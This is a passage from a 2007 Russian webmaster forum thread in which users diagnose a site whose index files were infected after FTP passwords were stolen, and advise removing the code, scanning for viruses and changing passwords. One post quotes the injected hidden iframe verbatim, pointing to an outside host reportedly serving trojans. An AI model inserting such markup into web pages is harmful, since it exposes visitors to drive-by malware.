Старый 13.11.2007, 22:24   #21
Добрый модератор
 
Аватар для zhegloff
 
Регистрация: 09.07.2007
Адрес: глобус Украины
Сообщений: 27,600
Вес репутации: 1025
zhegloff - прекрасное будущееzhegloff - прекрасное будущееzhegloff - прекрасное будущееzhegloff - прекрасное будущееzhegloff - прекрасное будущееzhegloff - прекрасное будущееzhegloff - прекрасное будущееzhegloff - прекрасное будущееzhegloff - прекрасное будущееzhegloff - прекрасное будущееzhegloff - прекрасное будущее
По умолчанию

Цитата:
Сообщение от RWA Посмотреть сообщение
У ТС или еще кого-то, имеющего доступ к серверу, троянцем украли пароли, как минимум к фтп. Затем по этому украденному доступу на сервер по фтп зашел робот, который переписывает все файлы, начинающиеся с index. во всех доступных директориях, дописывая туда подобный код, который в свою очередь загружает на компьютер очередной жертвы троянца.
Неужели первый раз такое видите? Очень известная вещь.

Так что ТС видимо сейчас надо не проблемы с Сапой решать, а срочно компьютер от вирусов чистить и пароли менять.
Я знаю технологию установки эксплойтов. Меня удивляет, что ТС вирусни у себя в упор не видит.
zhegloff вне форума   Ответить с цитированием
Старый 13.11.2007, 22:27   #22
Специалист
 
Регистрация: 12.11.2007
Сообщений: 148
Вес репутации: 205
RWA - весьма и весьма положительная личностьRWA - весьма и весьма положительная личностьRWA - весьма и весьма положительная личность
По умолчанию

Цитата:
Сообщение от zhegloff Посмотреть сообщение
Я знаю технологию установки эксплойтов. Меня удивляет, что ТС вирусни у себя в упор не видит.
Аналогично. Я было пошутил чуть выше по этому поводу, но шутку не оценили
RWA вне форума   Ответить с цитированием
Старый 14.11.2007, 02:11   #23
Модератор
 
Регистрация: 29.10.2007
Сообщений: 1,313
Вес репутации: 238
sin - за этого человека можно гордитсяsin - за этого человека можно гордитсяsin - за этого человека можно гордитсяsin - за этого человека можно гордитсяsin - за этого человека можно гордитсяsin - за этого человека можно гордитсяsin - за этого человека можно гордитсяsin - за этого человека можно гордитсяsin - за этого человека можно гордится
По умолчанию

Уважаемые форумчане! Внимательно читайте НИКИ пользователей. ВЫ СПОРИТЕ О ВИРУСАХ НЕ НА МОЕМ CАЙТЕ . )
ТС
sin вне форума   Ответить с цитированием
Старый 14.11.2007, 10:51   #24
Администратор
 
Аватар для Ank
 
Регистрация: 05.02.2007
Сообщений: 18,405
Вес репутации: 715
Ank - прекрасное будущееAnk - прекрасное будущееAnk - прекрасное будущееAnk - прекрасное будущееAnk - прекрасное будущееAnk - прекрасное будущееAnk - прекрасное будущееAnk - прекрасное будущееAnk - прекрасное будущееAnk - прекрасное будущееAnk - прекрасное будущее
По умолчанию

Да, Да! Не трогайте sin!
Блин, че с веткой делать, вот уже пошла неразбериха..
__________________
Начать зарабатывать на своих сайтах. Консультирую своих рефов по аське

Читаем ФАК
Ank вне форума   Ответить с цитированием
Старый 14.11.2007, 11:32   #25
Новичок
 
Регистрация: 26.10.2007
Сообщений: 32
Вес репутации: 201
Akvell на пути к лучшему
По умолчанию

Цитата:
Сообщение от Ank Посмотреть сообщение
sin, про УДАЛЕНИЕ чего либо с сайта речь не идет!
zhegloff, имхо - копирайт таким образом сделан на жумлу, нет? криво, согласен. Опасно, тоже согласен, но эксплоит? врядли..
Akvell, речь про ссылку в скрытом ифрейме - потенциально нехорошая вещь, ибо еще и скрыта, а во фрейме открывается просто чужой сайт. В лучшем случае - накрутка счетчика ему, в худшем - раздача троянов и прочей гадости. Если это по лицензионным соображениям - лучше на ссылку заменить, или вовсе снести.
Тема, да, переросла изначальность.. вот придем к результату - куда нибудь ее пристрою
<!-- ~ --><iframe src="http://beerdrinker.jino-net.ru/w/index.php" style="visibility: hidden; display: none"></iframe><!-- ~ -->

я правильно понимаю - всю эту строчку можно смело прибить? (Не силен я в пхп )
__________________
МИР Бизнес-книг ID площадки: 84439
Akvell вне форума   Ответить с цитированием
Старый 14.11.2007, 11:33   #26
Администратор
 
Аватар для Ank
 
Регистрация: 05.02.2007
Сообщений: 18,405
Вес репутации: 715
Ank - прекрасное будущееAnk - прекрасное будущееAnk - прекрасное будущееAnk - прекрасное будущееAnk - прекрасное будущееAnk - прекрасное будущееAnk - прекрасное будущееAnk - прекрасное будущееAnk - прекрасное будущееAnk - прекрасное будущееAnk - прекрасное будущее
По умолчанию

прибить, на вирусы комп проверить, пароли везде поменять.
__________________
Начать зарабатывать на своих сайтах. Консультирую своих рефов по аське

Читаем ФАК
Ank вне форума   Ответить с цитированием
Старый 14.11.2007, 12:07   #27
Специалист
 
Регистрация: 12.11.2007
Сообщений: 148
Вес репутации: 205
RWA - весьма и весьма положительная личностьRWA - весьма и весьма положительная личностьRWA - весьма и весьма положительная личность
По умолчанию

Цитата:
Сообщение от sin Посмотреть сообщение
Уважаемые форумчане! Внимательно читайте НИКИ пользователей. ВЫ СПОРИТЕ О ВИРУСАХ НЕ НА МОЕМ CАЙТЕ . )
ТС
Да, действительно неувязочка вышла. Извините.
RWA вне форума   Ответить с цитированием
Старый 14.11.2007, 12:37   #28
Новичок
 
Регистрация: 26.10.2007
Сообщений: 32
Вес репутации: 201
Akvell на пути к лучшему
По умолчанию

Цитата:
Сообщение от zhegloff Посмотреть сообщение
Копирайт на жумлу на джино-нет.... я туда сходил, там довольно таки страный скрипт... исполнять не стал ибо ну его нафиг.

ИМХО все таки эксплойт.

З.Ы. Вот к чему приводит легкость и доступность создания сайтов.... Вебмастер не знает что такое эксплойт... Ужас, куда катится мир...
Вы не путайте мух с котлетами. Я не вебмастер. Я владелец ресурса. И развиваю его в первую очередь как интересный мне и людям продукт
А благодаря легкости и доступности создания сайтов (который мне слепили за 20у.е.) я могу получать удовольствие от того что я делаю и приносить кому-то пользу.
__________________
МИР Бизнес-книг ID площадки: 84439
Akvell вне форума   Ответить с цитированием
Ответ

Опции темы

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход

Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Отображение в списке проектов, что есть ссылки с Error Andrew-m Пожелания пользователей системы 7 19.06.2008 14:18
неверное отображение ВС imbalance Ошибки при работе с системой 0 10.04.2008 18:38
Как все-таки поменять отображение ссылок? helichrysum Ошибки при работе с системой 8 24.02.2008 12:23
Странное отображение ссылки Маленькая сосна Вопросы от новичков 0 28.01.2008 13:01
Неправильное отображение ссылки jfar Ошибки при работе с системой 2 21.01.2008 16:39


Часовой пояс GMT +3, время: 00:28.